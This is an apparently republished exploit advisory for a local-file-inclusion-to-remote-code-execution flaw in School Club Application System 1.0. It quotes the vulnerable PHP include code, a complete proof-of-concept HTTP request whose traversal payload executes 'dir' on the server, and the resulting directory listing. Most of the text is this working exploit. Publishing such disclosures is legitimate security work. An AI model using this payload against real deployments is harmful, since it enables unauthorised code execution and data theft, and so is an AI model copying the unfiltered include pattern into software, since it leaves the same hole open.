School Club Application System 1.0 Local File Inclusion

2022.04.08
Credit: Hejap Zairy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Title: School Club Application System 1.0 LFI To RCE # Author: Hejap Zairy # Date: 08.04.2022 # Vendor: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scas_0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache #vulnerability Code php Needs more filtering require_once ``` <?php require_once('config.php'); $page = isset($_GET['page']) ? $_GET['page'] : 'home'; $page_name = explode("/",$page)[count(explode("/",$page)) -1]; ?> ``` [+] Payload GET ``` GET /scas/?page=../../0day&515=dir HTTP/1.1 Host: 0day.gov Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: ar,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=edh1ho9c9skog6v2ns0n0j3f2k Connection: close ``` #Status: CRITICAL #Response ``` HTTP/1.1 200 OK Date: Fri, 08 Apr 2022 04:05:58 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13563 </h1> <p class="lead text-white mt-3">.. .. 0day Page</p> </div> </div> </div> </div> </header> <div class="card card-body blur shadow-blur mx-3 mx-md-4 mt-n6"> Volume in drive C is OS Volume Serial Number is 2EF1-9DCA Directory of C:\xampp\htdocs\scas 04/08/2022 06:27 AM <DIR> . 04/08/2022 06:27 AM <DIR> .. 03/19/2021 01:17 PM 225 .htaccess 04/07/2022 10:03 AM 2,115 about.html 03/30/2022 04:31 PM 220 about.php 04/07/2022 03:56 PM <DIR> admin 04/08/2022 06:27 AM <DIR> assets 03/29/2022 04:17 PM <DIR> classes 04/07/2022 03:20 PM <DIR> clubs 04/07/2022 04:33 PM <DIR> club_admin 04/07/2022 02:39 PM <DIR> club_contents 03/30/2022 10:03 AM 1,297 config.php 04/07/2022 05:13 PM <DIR> database 03/30/2022 04:31 PM 256 home.php 03/29/2022 10:24 AM <DIR> includes 04/07/2022 03:18 PM 3,010 index.php 04/07/2022 09:35 AM 647 initialize.php 04/07/2022 08:18 AM <DIR> uploads 04/07/2022 10:03 AM 1,842 welcome.html 8 File(s) 9,612 bytes 11 Dir(s) 81,520,218,112 bytes free </div> ``` # Description: Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce # Proof and Exploit: https://i.imgur.com/3MbzZuQ.png https://i.imgur.com/mqXb1Mc.png


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top